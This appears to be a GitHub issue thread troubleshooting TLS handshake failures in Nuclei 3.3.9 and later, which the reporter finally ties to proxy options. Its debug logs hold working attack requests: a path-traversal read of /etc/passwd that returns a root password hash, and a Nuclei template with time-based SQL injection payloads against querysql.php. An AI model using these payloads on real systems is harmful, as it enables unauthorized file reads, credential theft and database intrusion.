After upgrading Nuclei to version 3.3.9, HTTPS protocol detection is reporting an error: "error: tls: handshake failure".

[cgw-99]

After upgrading Nuclei to version 3.3.9, HTTPS protocol detection is reporting an error: "error: tls: handshake failure".

D:\nuclei3.3.8 -t test.yaml -u https://192.168.0.1/ -debug

---

____ __ / / ()
/ __ / / / / / / _ / /
/ / / / // / // / __/ /
// //,////_/ v3.3.8

        projectdiscovery.io

[WRN] Found 24 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.3.8 (outdated)
[INF] Current nuclei-templates version: v10.1.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 64
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [test] Dumped HTTP request for https://192.168.0.1/view/action/download.php?filename=../../../../etc/passwd

GET /view/action/download.php?filename=../../../../etc/passwd HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Upgrade-Insecure-Requests: 1

[DBG] [test] Dumped HTTP response https://192.168.0.1/view/action/download.php?filename=../../../../etc/passwd

HTTP/1.1 200 OK
Connection: close
Accept-Ranges: bytes
Cache-Component: must-revalidate, post-check=0, pre-check=0
Content-Disposition: attachment; filename=
Content-Transfer-Encoding: binary
Content-Type: application/octet-stream
Date: Mon, 31 Mar 2025 09:12:36 GMT
Expires: 0
Pragma: public
Server: lighttpd/1.4.31
X-Powered-By: PHP/5.4.5

00000000 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e |
.Warnin|
00000010 67 3c 2f 62 3e 3a 20 20 66 69 6c 65 73 69 7a 65 |g: filesize|
00000020 28 29 3a 20 73 74 61 74 20 66 61 69 6c 65 64 20 |(): stat failed |
00000030 66 6f 72 20 2f 76 61 72 2f 77 77 77 2f 72 65 70 |for /var/www/rep|
00000040 6f 72 74 65 72 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e |orter../../../..|
00000050 2f 65 74 63 2f 70 61 73 73 77 64 20 69 6e 20 3c |/etc/passwd in <|
00000060 62 3e 2f 76 61 72 2f 77 77 77 2f 72 65 70 6f 72 |b>/var/www/repor|
00000070 74 65 72 2f 76 69 65 77 2f 61 63 74 69 6f 6e 2f |ter/view/action/|
00000080 64 6f 77 6e 6c 6f 61 64 2e 70 68 70 3c 2f 62 3e |download.php|
00000090 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 31 30 3c 2f | on line 10</|
000000a0 62 3e 3c 62 72 20 2f 3e 0a 72 6f 6f 74 3a 24 31 |b>
.root:$1|
000000b0 24 78 6d 35 6f 32 53 44 30 24 6c 4e 6b 52 50 34 |$xm5o2SD0$lNkRP4|
000000c0 45 53 49 59 75 53 75 5a 34 52 6b 6d 45 66 67 2f |ESIYuSuZ4RkmEfg/|
000000d0 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a |:0:0:root:/root:|
000000e0 2f 62 69 6e 2f 73 68 0a 62 69 6e 3a 2a 3a 31 3a |/bin/sh.bin::1:|
000000f0 31 3a 62 69 6e 3a 2f 62 69 6e 3a 0a 64 61 65 6d |1:bin:/bin:.daem|
00000100 6f 6e 3a 2a 3a 32 3a 32 3a 64 61 65 6d 6f 6e 3a |on::2:2:daemon:|
00000110 2f 73 62 69 6e 3a 0a 6e 6f 62 6f 64 79 3a 2a 3a |/sbin:.nobody:*:|
00000120 39 39 3a 39 39 3a 4e 6f 62 6f 64 79 3a 2f 3a 0a |99:99:Nobody:/:.|
00000130 73 73 68 64 3a 78 3a 37 34 3a 37 34 3a 50 72 69 |sshd:x:74:74:Pri|
00000140 76 69 6c 65 67 65 2d 73 65 70 61 72 61 74 65 64 |vilege-separated|
00000150 20 53 53 48 3a 2f 76 61 72 2f 65 6d 70 74 79 2f | SSH:/var/empty/|
00000160 73 73 68 64 3a 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 |sshd:/sbin/nolog|
00000170 69 6e 0a |in.|
[test:dsl-1] [http] [medium] https://192.168.0.1/view/action/download.php?filename=../../../../etc/passwd

D:\nuclei3.3.9 -t test.yaml -u https://192.168.0.1/ -debug

             __     _

____ __ / / ()
/ __ / / / / / / _ / /
/ / / / // / // / __/ /
// //,////_/ v3.3.9

        projectdiscovery.io

[WRN] Found 24 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.3.9 (outdated)
[INF] Current nuclei-templates version: v10.1.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 64
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [test] Dumped HTTP request for https://192.168.0.1/view/action/download.php?filename=../../../../etc/passwd

GET /view/action/download.php?filename=../../../../etc/passwd HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Upgrade-Insecure-Requests: 1

[WRN] [test] Could not execute request for https://192.168.0.1/: [:RUNTIME] got err while executing https://192.168.0.1/view/action/download.php?filename=../../../../etc/passwd <- GET https://192.168.0.1/view/action/download.php?filename=../../../../etc/passwd giving up after 2 attempts: Get "https://192.168.0.1/view/action/download.php?filename=../../../../etc/passwd": remote error: tls: handshake failure
[INF] No results found. Better luck next time!

[cgw-99]

Another column

id: test2
info:
name: test2
author: Cgw
severity: high
description:
reference:
- https://
tags:
flow: http(1) && http(2) && http(3)
http:

• raw:

  • |-
    POST /Tool/querysql.php? HTTP/1.1
    Host: {{Hostname}}
    Cookie: PHPSESSID=1103e71de66c2a8a4084819a754e7202
    Content-Length: 29
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7

    txt=select if(1=1,sleep(0),1)

  matchers:

  • type: dsl
    dsl:
    • 'duration >=0 && duration <=3 && status_code == 200 && contains_all(body,"执行sql语句")'
      internal: true

• raw:

  • |-
    POST /Tool/querysql.php? HTTP/1.1
    Host: {{Hostname}}
    Cookie: PHPSESSID=1103e71de66c2a8a4084819a754e7202
    Content-Length: 29
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7

    txt=select if(1=1,sleep(3),1)

  • type: dsl
    dsl:

    • 'duration >=3 && duration <=6 && status_code == 200 && contains_all(body,"执行sql语句")'
      internal: true

• raw:

  • |-
    POST /Tool/querysql.php? HTTP/1.1
    Host: {{Hostname}}
    Cookie: PHPSESSID=1103e71de66c2a8a4084819a754e7202
    Content-Length: 29
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7

    txt=select if(1=1,sleep(6),1)

  matchers:

  • type: dsl
    dsl:
    • 'duration >=6 && duration <=9 && status_code == 200 && contains_all(body,"执行sql语句")'

Nuclei3.3.8:

nuclei3.8 -t test.yaml -u https://192.168.0.1 -debug

                 __     _

____ __ / / ()
/ __ / / / / / / _ / /
/ / / / // / // / __/ /
// //_,/_/_/_/_/ v3.3.8

            projectdiscovery.io

[WRN] Found 24 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.3.8 (outdated)
[INF] Current nuclei-templates version: v10.1.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 64
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [Smart_querysql_SQLi] Dumped HTTP request for https://192.168.0.1/Tool/querysql.php

POST /Tool/querysql.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Connection: close
Content-Length: 30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=1103e71de66c2a8a4084819a754e7202
Accept-Encoding: gzip

txt=select if(1=1,sleep(0),1)
[DBG] [Smart_querysql_SQLi] Dumped HTTP response https://192.168.0.1/Tool/querysql.php

HTTP/1.1 200 OK
Connection: close
Content-Length: 330
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=gb2312
Date: Wed, 18 Sep 2030 16:17:23 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.4 (Unix) PHP/4.4.6 mod_ssl/2.2.4 OpenSSL/0.9.8k
X-Powered-By: PHP/4.4.6

select if(1=1,sleep(0),1)

<title> 执行sql语句 </title>

Nuclei3.4.2:

nuclei -t test.yaml -u https://192.168.0.1 -debug

                 __     _

____ __ / / ()
/ __ / / / / / / _ / /
/ / / / // / // / __/ /
// //_,/_/_/_/_/ v3.4.2

            projectdiscovery.io

[WRN] Found 24 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.4.2 (latest)
[INF] Current nuclei-templates version: v10.1.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 64
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [Smart_querysql_SQLi] Dumped HTTP request for https://192.168.0.1/Tool/querysql.php

POST /Tool/querysql.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Connection: close
Content-Length: 30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=1103e71de66c2a8a4084819a754e7202
Accept-Encoding: gzip

txt=select if(1=1,sleep(0),1)
[WRN] [Smart_querysql_SQLi] Could not execute step: [:RUNTIME] got following errors while executing flow <- [:RUNTIME] failed to execute http:1 protocol <- [:RUNTIME] got err while executing https://192.168.0.1/Tool/querysql.php <- POST https://192.168.0.1/Tool/querysql.php giving up after 2 attempts: Post "https://192.168.0.1/Tool/querysql.php": remote error: tls: handshake failure
[INF] No results found. Better luck next time!

[GeorginaReeder]

Hi there @cgw-99 ! Thanks for your question. Let's see if we can take this step by step.

First, could you try running this command to check what TLS versions and cipher suites the server supports? We can see if it only supports outdated TLS versions like TLS 1.0/1.1, or weak cipher suites:

openssl s_client -connect 192.168.0.1:443

Something else you could try is the -insecure flag, since it might be that newer versions of Nuclei are enforcing stricter certificate checks.

nuclei -t test.yaml -u https://192.168.0.1/ -debug -insecure

Let us know if that helps. If not, we can take a closer look!

[cgw-99]

openssl s_client -connect 192.168.0.1:8443

Connecting to 192.168.0.1
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 C= , ST= , O= , OU= , CN= , emailAddress=
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 C= , ST= , O= , OU= , CN= , emailAddress=
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 C= , ST= , O= , OU= , CN= , emailAddress=
verify error:num=10:certificate has expired
notAfter=Dec 28 04:29:58 2011 GMT
verify return:1
depth=0 C= , ST= , O= , OU= , CN= , emailAddress=
notAfter=Dec 28 04:29:58 2011 GMT
verify return:1

Certificate chain
0 s:C= , ST= , O= , OU= , CN= , emailAddress=
i:C= , ST= , L= , O= , OU= , CN= , emailAddress=
a:PKEY: rsaEncryption, 1024 (bit); sigalg: RSA-SHA1
v:NotBefore: Dec 28 04:29:58 2010 GMT; NotAfter: Dec 28 04:29:58 2011 GMT

Server certificate
-----BEGIN CERTIFICATE-----
MIICpjCCAg+gAwIBAgIBAjANBgkqhkiG9w0BAQUFADBhMQswCQYDVQQGEwIgIDEL
MAkGA1UECBMCICAxCzAJBgNVBAcTAiAgMQswCQYDVQQKEwIgIDELMAkGA1UECxMC
ICAxCzAJBgNVBAMTAiAgMREwDwYJKoZIhvcNAQkBFgIgIDAeFw0xMDEyMjgwNDI5
NThaFw0xMTEyMjgwNDI5NThaMFQxCzAJBgNVBAYTAiAgMQswCQYDVQQIEwIgIDEL
MAkGA1UEChMCICAxCzAJBgNVBAsTAiAgMQswCQYDVQQDEwIgIDERMA8GCSqGSIb3
DQEJARYCICAwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALR+u/cfIUI4C7+a
N9iuKgtcqB/nBC3phhIKiFutRdQUoLveEvJF/Somfe/zkjpHQaZGOnan6ITkgrEO
9r7yU57Pkp1H6z2L3yBQWGBg2yD4fcgUVDkztKDJLBghI1AV+NuJGlkvWkgH9mga
+43l/L6g0jgGzuVNlqPiYVkMDeZxAgMBAAGjezB5MAkGA1UdEwQCMAAwLAYJYIZI
AYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQW
BBRysB2YhdvfPbTQK7vkyVMwDPn6ADAfBgNVHSMEGDAWgBRS2AyoDqmOceLyaWoN
yJ4y+fGP0jANBgkqhkiG9w0BAQUFAAOBgQB4yU4/4RaGeAcPmQJR9BHT3y2Xhfcd
OQHafxP+r/5AyNhxrkNNzv9CmIaLPBh5cH1Ng5v7wjmDvRZCgDn9TnoCuA0reCUG
uoSwnSnuz9k+eVngyTiTBMIo6SbIFX4bg0B7Y8g2oX8EeBNq+efVqgZArXO2nGvW
huOpU7BAQ34XLQ==
-----END CERTIFICATE-----
subject=C= , ST= , O= , OU= , CN= , emailAddress=
issuer=C= , ST= , L= , O= , OU= , CN= , emailAddress=

No client certificate CA names sent
Peer signing digest: MD5-SHA1
Peer signature type: RSA
Server Temp Key: DH, 1024 bits

SSL handshake has read 1427 bytes and written 636 bytes
Verification error: certificate has expired

New, SSLv3, Cipher is DHE-RSA-AES256-SHA
Protocol: TLSv1
Server public key is 1024 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
Protocol : TLSv1
Cipher : DHE-RSA-AES256-SHA
Session-ID: 20D3C5377149B33625F4E235FEE813894FEF64B4CB0566E61F4B3F1EB863D839
Session-ID-ctx:
Master-Key: 42513FBD73AE40F9CFAF516A958EB712C779C46EBDE56E07DC1AD1C123C561B79AD0ADC519CC3916A410D07145C44D2B
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket:
0000 - 67 5a 82 37 7b 45 03 de-57 51 ac 1c 5b 1f b6 e4 gZ.7{E..WQ..[...
0010 - 22 ad e1 ab ad 1c 0e 96-5f f7 90 89 17 88 5b 38 "......._.....[8
0020 - c8 64 b0 05 37 8a b3 28-37 a6 5d fd cc 70 56 aa .d..7..(7.]..pV.
0030 - c3 99 70 b5 99 c3 2e 3c-12 73 d9 d7 d5 f5 bc de ..p....<.s......
0040 - ac 6d 1c fc 30 bb 80 6b-1c 44 a2 13 05 25 2f 9f .m..0..k.D...%/.
0050 - 4d f3 01 cf ae 76 e2 c1-e3 e3 7b e7 be 11 b1 6a M....v....{....j
0060 - b6 13 02 1c ed 9d 4e d6-25 5e 45 5d 63 80 1d ce ......N.%^E]c...
0070 - d4 6c 1f 47 c1 d9 20 ed-7c 3d 75 d5 82 92 d1 fa .l.G.. .|=u.....
0080 - e6 23 2e f7 e3 65 d7 04-04 be 2c 9b 70 11 f6 27 .#...e....,.p..'
0090 - d2 2b 2c a6 46 25 91 d3-88 20 fb 1f 25 42 05 06 .+,.F%... ..%B..
00a0 - f4 6a 9f 18 e5 0e 59 03-48 7c fa bb cd 49 b9 bf .j....Y.H|...I..
00b0 - 4e aa a0 a5 08 61 82 57-6b 91 c3 cf 30 ce 4e 52 N....a.Wk...0.NR

Start Time: 1744778395
Timeout   : 7200 (sec)
Verify return code: 10 (certificate has expired)
Extended master secret: no

---

closed

[cgw-99]

Through rigorous testing, it has been discovered that ‌versions after 3.3.8‌ will exhibit this issue ‌only when using the proxy options‌ -p http://127.0.0.1:1080 or -p socks5://127.0.0.1:1080.